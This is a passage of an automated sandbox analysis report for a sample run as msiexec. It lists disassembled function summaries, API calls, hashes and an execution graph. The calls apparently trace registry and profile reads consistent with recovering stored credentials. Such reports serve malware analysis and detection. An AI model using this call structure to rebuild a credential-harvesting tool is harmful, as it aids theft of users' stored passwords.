                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$memset
                                                                                • String ID:
                                                                                • API String ID: 1860491036-0
                                                                                • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                APIs
                                                                                • wcslen.MSVCRT ref: 0040A8E2
                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                • free.MSVCRT ref: 0040A908
                                                                                • free.MSVCRT ref: 0040A92B
                                                                                • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                • String ID:
                                                                                • API String ID: 726966127-0
                                                                                • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                APIs
                                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                                • free.MSVCRT ref: 0040B201
                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                • free.MSVCRT ref: 0040B224
                                                                                • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                • String ID:
                                                                                • API String ID: 726966127-0
                                                                                • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                APIs
                                                                                • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                  • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcmp$memcpy
                                                                                • String ID:
                                                                                • API String ID: 231171946-0
                                                                                • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                APIs
                                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                                • free.MSVCRT ref: 0040B0FB
                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                • free.MSVCRT ref: 0040B12C
                                                                                • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: free$memcpy$mallocstrlen
                                                                                • String ID:
                                                                                • API String ID: 3669619086-0
                                                                                • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@
                                                                                • String ID:
                                                                                • API String ID: 1033339047-0
                                                                                • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                • malloc.MSVCRT ref: 00417407
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                • free.MSVCRT ref: 00417425
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                • String ID:
                                                                                • API String ID: 2605342592-0
                                                                                • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen$wcscat$wcscpy
                                                                                • String ID:
                                                                                • API String ID: 1961120804-0
                                                                                • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                Execution Graph

                                                                                Execution Coverage:2.1%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0.5%
                                                                                Total number of Nodes:762
                                                                                Total number of Limit Nodes:20
                                                                                execution_graph 34006 40fc40 70 API calls 34181 403640 21 API calls 34007 427fa4 42 API calls 34182 412e43 _endthreadex 34183 425115 76 API calls __fprintf_l 34184 43fe40 133 API calls 34010 425115 83 API calls __fprintf_l 34011 401445 memcpy memcpy DialogBoxParamA 34012 440c40 34 API calls 33227 444c4a 33246 444e38 33227->33246 33229 444c56 GetModuleHandleA 33230 444c68 __set_app_type __p__fmode __p__commode 33229->33230 33232 444cfa 33230->33232 33233 444d02 __setusermatherr 33232->33233 33234 444d0e 33232->33234 33233->33234 33247 444e22 _controlfp 33234->33247 33236 444d13 _initterm __getmainargs _initterm 33237 444d6a GetStartupInfoA 33236->33237 33239 444d9e GetModuleHandleA 33237->33239 33248 40cf44 33239->33248 33243 444dcf _cexit 33245 444e04 33243->33245 33244 444dc8 exit 33244->33243 33246->33229 33247->33236 33299 404a99 LoadLibraryA 33248->33299 33250 40cf60 33251 40cf64 33250->33251 33307 410d0e 33250->33307 33251->33243 33251->33244 33253 40cf6f 33311 40ccd7 ??2@YAPAXI 33253->33311 33255 40cf9b 33325 407cbc 33255->33325 33260 40cfc4 33344 409825 memset 33260->33344 33261 40cfd8 33349 4096f4 memset 33261->33349 33266 40d181 ??3@YAXPAX 33268 40d1b3 33266->33268 33269 40d19f DeleteObject 33266->33269 33267 407e30 _strcmpi 33270 40cfee 33267->33270 33373 407948 free free 33268->33373 33269->33268 33272 40cff2 RegDeleteKeyA 33270->33272 33273 40d007 EnumResourceTypesA 33270->33273 33272->33266 33275 40d047 33273->33275 33276 40d02f MessageBoxA 33273->33276 33274 40d1c4 33374 4080d4 free 33274->33374 33278 40d0a0 CoInitialize 33275->33278 33354 40ce70 33275->33354 33276->33266 33371 40cc26 strncat memset RegisterClassA CreateWindowExA 33278->33371 33281 40d1cd 33375 407948 free free 33281->33375 33283 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33372 40c256 PostMessageA 33283->33372 33285 40d061 ??3@YAXPAX 33285->33268 33288 40d084 DeleteObject 33285->33288 33286 40d09e 33286->33278 33288->33268 33291 40d0f9 GetMessageA 33292 40d17b CoUninitialize 33291->33292 33293 40d10d 33291->33293 33292->33266 33294 40d113 TranslateAccelerator 33293->33294 33296 40d145 IsDialogMessage 33293->33296 33297 40d139 IsDialogMessage 33293->33297 33294->33293 33295 40d16d GetMessageA 33294->33295 33295->33292 33295->33294 33296->33295 33298 40d157 TranslateMessage DispatchMessageA 33296->33298 33297->33295 33297->33296 33298->33295 33300 404ac4 GetProcAddress 33299->33300 33301 404aec 33299->33301 33302 404ad4 33300->33302 33303 404add FreeLibrary 33300->33303 33305 404b13 33301->33305 33306 404afc MessageBoxA 33301->33306 33302->33303 33303->33301 33304 404ae8 33303->33304 33304->33301 33305->33250 33306->33250 33308 410d17 LoadLibraryA 33307->33308 33309 410d3c 33307->33309 33308->33309 33310 410d2b GetProcAddress 33308->33310 33309->33253 33310->33309 33312 40cd08 ??2@YAPAXI 33311->33312 33314 40cd26 33312->33314 33316 40cd2d 33312->33316 33383 404025 6 API calls 33314->33383 33317 40cd66 33316->33317 33318 40cd59 DeleteObject 33316->33318 33376 407088 33317->33376 33318->33317 33320 40cd6b 33379 4019b5 33320->33379 33323 4019b5 strncat 33324 40cdbf _mbscpy 33323->33324 33324->33255 33385 407948 free free 33325->33385 33327 407e04 33386 407a55 33327->33386 33330 407a1f malloc memcpy free free 33332 407cf7 33330->33332 33331 407ddc 33331->33327 33391 407a1f 33331->33391 33332->33327 33332->33330 33332->33331 33334 407d83 33332->33334 33335 407d7a free 33332->33335 33389 40796e 7 API calls 33332->33389 33334->33332 33390 406f30 malloc memcpy free 33334->33390 33335->33332 33340 407e30 33342 407e38 33340->33342 33343 407e57 33340->33343 33341 407e41 _strcmpi 33341->33342 33341->33343 33342->33341 33342->33343 33343->33260 33343->33261 33399 4097ff 33344->33399 33346 409854 33404 409731 33346->33404 33350 4097ff 3 API calls 33349->33350 33351 409723 33350->33351 33424 40966c 33351->33424 33438 4023b2 33354->33438 33360 40ced3 33522 40cdda 7 API calls 33360->33522 33361 40cece 33364 40cf3f 33361->33364 33475 40c3d0 memset GetModuleFileNameA strrchr 33361->33475 33364->33285 33364->33286 33367 40ceed 33501 40affa 33367->33501 33371->33283 33372->33291 33373->33274 33374->33281 33375->33251 33384 406fc7 memset _mbscpy 33376->33384 33378 40709f CreateFontIndirectA 33378->33320 33380 4019e1 33379->33380 33381 4019c2 strncat 33380->33381 33382 4019e5 memset LoadIconA 33380->33382 33381->33380 33382->33323 33383->33316 33384->33378 33385->33332 33387 407a65 33386->33387 33388 407a5b free 33386->33388 33387->33340 33388->33387 33389->33332 33390->33334 33392 407a38 33391->33392 33393 407a2d free 33391->33393 33398 406f30 malloc memcpy free 33392->33398 33396 407a44 33393->33396 33395 407a43 33395->33396 33397 40796e 7 API calls 33396->33397 33397->33327 33398->33395 33415 406f96 GetModuleFileNameA 33399->33415 33401 409805 strrchr 33402 409814 33401->33402 33403 409817 _mbscat 33401->33403 33402->33403 33403->33346 33416 44b090 33404->33416 33409 40930c 3 API calls 33410 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33409->33410 33411 4097c5 LoadStringA 33410->33411 33412 4097db 33411->33412 33412->33411 33413 4097f3 33412->33413 33423 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33412->33423 33413->33266 33415->33401 33417 40973e _mbscpy _mbscpy 33416->33417 33418 40930c 33417->33418 33419 44b090 33418->33419 33420 409319 memset GetPrivateProfileStringA 33419->33420 33421 409374 33420->33421 33422 409364 WritePrivateProfileStringA 33420->33422 33421->33409 33422->33421 33423->33412 33434 406f81 GetFileAttributesA 33424->33434 33426 409675 33427 4096ee 33426->33427 33428 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33426->33428 33427->33267 33435 409278 GetPrivateProfileStringA 33428->33435 33430 4096c9 33436 409278 GetPrivateProfileStringA 33430->33436 33432 4096da 33437 409278 GetPrivateProfileStringA 33432->33437 33434->33426 33435->33430 33436->33432 33437->33427 33524 409c1c 33438->33524 33441 401e69 memset 33563 410dbb 33441->33563 33444 401ec2 33587 4070e3 strlen _mbscat _mbscpy _mbscat 33444->33587 33445 401ed4 33576 406f81 GetFileAttributesA 33445->33576 33448 401ee6 strlen strlen 33450 401f15 33448->33450 33451 401f28 33448->33451 33588 4070e3 strlen _mbscat _mbscpy _mbscat 33450->33588 33577 406f81 GetFileAttributesA 33451->33577 33454 401f35 33578 401c31 33454->33578 33457 401f75 33459 402165 33457->33459 33460 401f9c memset 33457->33460 33458 401c31 5 API calls 33458->33457 33462 402195 ExpandEnvironmentStringsA 33459->33462 33463 4021a8 _strcmpi 33459->33463 33589 410b62 RegEnumKeyExA 33460->33589 33595 406f81 GetFileAttributesA 33462->33595 33463->33360 33463->33361 33465 401fd9 atoi 33466 401fef memset memset sprintf 33465->33466 33472 401fc9 33465->33472 33590 410b1e 33466->33590 33469 402076 memset memset strlen strlen 33469->33472 33470 4070e3 strlen _mbscat _mbscpy _mbscat 33470->33472 33471 4020dd strlen strlen 33471->33472 33472->33459 33472->33465 33472->33469 33472->33470 33472->33471 33473 406f81 GetFileAttributesA 33472->33473 33474 402167 _mbscpy 33472->33474 33594 410b62 RegEnumKeyExA 33472->33594 33473->33472 33474->33459 33476 40c422 33475->33476 33477 40c425 _mbscat _mbscpy _mbscpy 33475->33477 33476->33477 33478 40c49d 33477->33478 33479 40c512 33478->33479 33480 40c502 GetWindowPlacement 33478->33480 33481 40c538 33479->33481 33613 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33479->33613 33480->33479 33606 409b31 33481->33606 33485 40ba28 33486 40ba87 33485->33486 33492 40ba3c 33485->33492 33616 406c62 LoadCursorA SetCursor 33486->33616 33488 40ba8c 33617 403c16 33488->33617 33683 404734 33488->33683 33691 404785 33488->33691 33694 4107f1 33488->33694 33489 40ba43 _mbsicmp 33489->33492 33490 40baa0 33491 407e30 _strcmpi 33490->33491 33495 40bab0 33491->33495 33492->33486 33492->33489 33697 40b5e5 10 API calls 33492->33697 33493 40bafa SetCursor 33493->33367 33495->33493 33496 40baf1 qsort 33495->33496 33496->33493 33990 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33501->33990 33503 40b00e 33504 40b016 33503->33504 33505 40b01f GetStdHandle 33503->33505 33991 406d1a CreateFileA 33504->33991 33507 40b01c 33505->33507 33508 40b035 33507->33508 33509 40b12d 33507->33509 33992 406c62 LoadCursorA SetCursor 33508->33992 33996 406d77 9 API calls 33509->33996 33512 40b136 33523 40c580 28 API calls 33512->33523 33513 40b042 33514 40b087 33513->33514 33520 40b0a1 33513->33520 33993 40a57c strlen WriteFile 33513->33993 33514->33520 33994 40a699 12 API calls 33514->33994 33517 40b0d6 33518 40b116 CloseHandle 33517->33518 33519 40b11f SetCursor 33517->33519 33518->33519 33519->33512 33520->33517 33995 406d77 9 API calls 33520->33995 33522->33361 33523->33364 33536 409a32 33524->33536 33527 409c80 memcpy memcpy 33530 409cda 33527->33530 33528 408db6 12 API calls 33528->33530 33529 409d18 ??2@YAPAXI ??2@YAPAXI 33531 409d54 ??2@YAPAXI 33529->33531 33534 409d8b 33529->33534 33530->33527 33530->33528 33530->33529 33531->33534 33546 409b9c 33534->33546 33535 4023c1 33535->33441 33537 409a44 33536->33537 33538 409a3d ??3@YAXPAX 33536->33538 33539 409a52 33537->33539 33540 409a4b ??3@YAXPAX 33537->33540 33538->33537 33541 409a63 33539->33541 33542 409a5c ??3@YAXPAX 33539->33542 33540->33539 33543 409a83 ??2@YAPAXI ??2@YAPAXI 33541->33543 33544 409a73 ??3@YAXPAX 33541->33544 33545 409a7c ??3@YAXPAX 33541->33545 33542->33541 33543->33527 33544->33545 33545->33543 33547 407a55 free 33546->33547 33548 409ba5 33547->33548 33549 407a55 free 33548->33549 33550 409bad 33549->33550 33551 407a55 free 33550->33551 33552 409bb5 33551->33552 33553 407a55 free 33552->33553 33554 409bbd 33553->33554 33555 407a1f 4 API calls 33554->33555 33556 409bd0 33555->33556 33557 407a1f 4 API calls 33556->33557 33558 409bda 33557->33558 33559 407a1f 4 API calls 33558->33559 33560 409be4 33559->33560 33561 407a1f 4 API calls 33560->33561 33562 409bee 33561->33562 33562->33535 33564 410d0e 2 API calls 33563->33564 33565 410dca 33564->33565 33566 410dfd memset 33565->33566 33596 4070ae 33565->33596 33569 410e1d 33566->33569 33570 410e7f _mbscpy 33569->33570 33599 410d3d _mbscpy 33569->33599 33571 401e9e strlen strlen 33570->33571 33571->33444 33571->33445 33573 410e5b 33600 410add RegQueryValueExA 33573->33600 33575 410e73 33575->33570 33576->33448 33577->33454 33579 401c4c 33578->33579 33586 401ca1 33579->33586 33601 410add RegQueryValueExA 33579->33601 33581 401c6a 33582 401c71 strchr 33581->33582 33581->33586 33583 401c85 strchr 33582->33583 33582->33586 33584 401c94 33583->33584 33583->33586 33602 406f06 strlen 33584->33602 33586->33457 33586->33458 33587->33445 33588->33451 33589->33472 33591 410b34 33590->33591 33592 410b4c 33591->33592 33605 410add RegQueryValueExA 33591->33605 33592->33472 33594->33472 33595->33463 33597 4070bd GetVersionExA 33596->33597 33598 4070ce 33596->33598 33597->33598 33598->33566 33598->33571 33599->33573 33600->33575 33601->33581 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33586 33605->33592 33607 409b40 33606->33607 33609 409b4e 33606->33609 33614 409901 memset SendMessageA 33607->33614 33610 409b99 33609->33610 33611 409b8b 33609->33611 33610->33485 33615 409868 SendMessageA 33611->33615 33613->33481 33614->33609 33615->33610 33616->33488 33618 4107f1 FreeLibrary 33617->33618 33619 403c30 LoadLibraryA 33618->33619 33620 403c74 33619->33620 33621 403c44 GetProcAddress 33619->33621 33623 4107f1 FreeLibrary 33620->33623 33621->33620 33622 403c5e 33621->33622 33622->33620 33627 403c6b 33622->33627 33624 403c7b 33623->33624 33625 404734 3 API calls 33624->33625 33626 403c86 33625->33626 33698 4036e5 33626->33698 33627->33624 33630 4036e5 27 API calls 33631 403c9a 33630->33631 33632 4036e5 27 API calls 33631->33632 33633 403ca4 33632->33633 33634 4036e5 27 API calls 33633->33634 33635 403cae 33634->33635 33710 4085d2 33635->33710 33641 403cd2 33643 403cf7 33641->33643 33862 402bd1 37 API calls 33641->33862 33644 403d1c 33643->33644 33863 402bd1 37 API calls 33643->33863 33745 402c5d 33644->33745 33648 4070ae GetVersionExA 33649 403d31 33648->33649 33651 403d61 33649->33651 33864 402b22 42 API calls 33649->33864 33653 403d97 33651->33653 33865 402b22 42 API calls 33651->33865 33654 403dcd 33653->33654 33866 402b22 42 API calls 33653->33866 33757 410808 33654->33757 33658 404785 FreeLibrary 33659 403de8 33658->33659 33761 402fdb 33659->33761 33662 402fdb 29 API calls 33663 403e00 33662->33663 33773 4032b7 33663->33773 33672 403e3b 33674 403e73 33672->33674 33675 403e46 _mbscpy 33672->33675 33820 40fb00 33674->33820 33868 40f334 333 API calls 33675->33868 33684 404785 FreeLibrary 33683->33684 33685 40473b LoadLibraryA 33684->33685 33686 40474c GetProcAddress 33685->33686 33687 40476e 33685->33687 33686->33687 33688 404764 33686->33688 33689 404781 33687->33689 33690 404785 FreeLibrary 33687->33690 33688->33687 33689->33490 33690->33689 33692 4047a3 33691->33692 33693 404799 FreeLibrary 33691->33693 33692->33490 33693->33692 33695 410807 33694->33695 33696 4107fc FreeLibrary 33694->33696 33695->33490 33696->33695 33697->33492 33699 4037c5 33698->33699 33700 4036fb 33698->33700 33699->33630 33869 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33700->33869 33702 40370e 33702->33699 33703 403716 strchr 33702->33703 33703->33699 33704 403730 33703->33704 33870 4021b6 memset 33704->33870 33706 40373f _mbscpy _mbscpy strlen 33707 4037a4 _mbscpy 33706->33707 33708 403789 sprintf 33706->33708 33871 4023e5 16 API calls 33707->33871 33708->33707 33711 4085e2 33710->33711 33872 4082cd 11 API calls 33711->33872 33713 4085ec 33714 403cba 33713->33714 33715 40860b memset 33713->33715 33722 40821d 33714->33722 33874 410b62 RegEnumKeyExA 33715->33874 33717 408637 33717->33714 33718 40865c memset 33717->33718 33876 40848b 10 API calls 33717->33876 33877 410b62 RegEnumKeyExA 33717->33877 33875 410add RegQueryValueExA 33718->33875 33723 40823f 33722->33723 33724 403cc6 33723->33724 33725 408246 memset 33723->33725 33730 4086e0 33724->33730 33878 410b62 RegEnumKeyExA 33725->33878 33727 40826f 33727->33724 33879 4080ed 11 API calls 33727->33879 33880 410b62 RegEnumKeyExA 33727->33880 33881 4045db 33730->33881 33732 4088ef 33889 404656 33732->33889 33736 408737 wcslen 33736->33732 33742 40876a 33736->33742 33737 40877a wcsncmp 33737->33742 33739 404734 3 API calls 33739->33742 33740 404785 FreeLibrary 33740->33742 33741 408812 memset 33741->33742 33743 40883c memcpy wcschr 33741->33743 33742->33732 33742->33737 33742->33739 33742->33740 33742->33741 33742->33743 33744 4088c3 LocalFree 33742->33744 33892 40466b _mbscpy 33742->33892 33743->33742 33744->33742 33746 402c7a 33745->33746 33747 402d9a 33746->33747 33748 402c87 memset 33746->33748 33747->33648 33893 410b62 RegEnumKeyExA 33748->33893 33750 410b1e RegQueryValueExA 33751 402ce4 memset sprintf 33750->33751 33754 402cb2 33751->33754 33752 402d3a sprintf 33752->33754 33754->33747 33754->33750 33754->33752 33894 402bd1 37 API calls 33754->33894 33895 402bd1 37 API calls 33754->33895 33896 410b62 RegEnumKeyExA 33754->33896 33758 410816 33757->33758 33759 4107f1 FreeLibrary 33758->33759 33760 403ddd 33759->33760 33760->33658 33762 402ff9 33761->33762 33763 403006 memset 33762->33763 33764 403122 33762->33764 33897 410b62 RegEnumKeyExA 33763->33897 33764->33662 33766 410b1e RegQueryValueExA 33767 403058 memset sprintf 33766->33767 33771 403033 33767->33771 33768 4030a2 memset 33898 410b62 RegEnumKeyExA 33768->33898 33771->33764 33771->33766 33771->33768 33772 410b62 RegEnumKeyExA 33771->33772 33899 402db3 24 API calls 33771->33899 33772->33771 33774 4032d5 33773->33774 33775 4033a9 33773->33775 33900 4021b6 memset 33774->33900 33788 4034e4 memset memset 33775->33788 33777 4032e1 33901 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33777->33901 33779 4032ea 33780 4032f8 memset GetPrivateProfileSectionA 33779->33780 33902 4023e5 16 API calls 33779->33902 33780->33775 33785 40332f 33780->33785 33782 40339b strlen 33782->33775 33782->33785 33784 403350 strchr 33784->33785 33785->33775 33785->33782 33903 4021b6 memset 33785->33903 33904 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33785->33904 33905 4023e5 16 API calls 33785->33905 33789 410b1e RegQueryValueExA 33788->33789 33790 40353f 33789->33790 33791 40357f 33790->33791 33792 403546 _mbscpy 33790->33792 33796 403985 33791->33796 33906 406d55 strlen _mbscat 33792->33906 33794 403565 _mbscat 33907 4033f0 19 API calls 33794->33907 33908 40466b _mbscpy 33796->33908 33800 4039aa 33802 4039ff 33800->33802 33909 40f6e2 33800->33909 33925 40f460 12 API calls 33800->33925 33926 4038e8 21 API calls 33800->33926 33803 404785 FreeLibrary 33802->33803 33804 403a0b 33803->33804 33805 4037ca memset memset 33804->33805 33928 444551 memset 33805->33928 33808 4038e2 33808->33672 33867 40f334 333 API calls 33808->33867 33810 40382e 33811 406f06 2 API calls 33810->33811 33812 403843 33811->33812 33813 406f06 2 API calls 33812->33813 33814 403855 strchr 33813->33814 33815 403884 _mbscpy 33814->33815 33816 403897 strlen 33814->33816 33817 4038bf _mbscpy 33815->33817 33816->33817 33818 4038a4 sprintf 33816->33818 33937 4023e5 16 API calls 33817->33937 33818->33817 33822 40fb10 33820->33822 33821 403e7f 33830 40f96c 33821->33830 33822->33821 33823 40fb55 RegQueryValueExA 33822->33823 33823->33821 33824 40fb84 33823->33824 33825 404734 3 API calls 33824->33825 33826 40fb91 33825->33826 33826->33821 33827 40fc19 LocalFree 33826->33827 33828 40fbdd memcpy memcpy 33826->33828 33827->33821 33941 40f802 7 API calls 33828->33941 33831 4070ae GetVersionExA 33830->33831 33832 40f98d 33831->33832 33833 4045db 7 API calls 33832->33833 33837 40f9a9 33833->33837 33834 40fae6 33835 404656 FreeLibrary 33834->33835 33836 403e85 33835->33836 33842 4442ea memset 33836->33842 33837->33834 33838 40fa13 memset WideCharToMultiByte 33837->33838 33838->33837 33839 40fa43 _strnicmp 33838->33839 33839->33837 33840 40fa5b WideCharToMultiByte 33839->33840 33840->33837 33841 40fa88 WideCharToMultiByte 33840->33841 33841->33837 33843 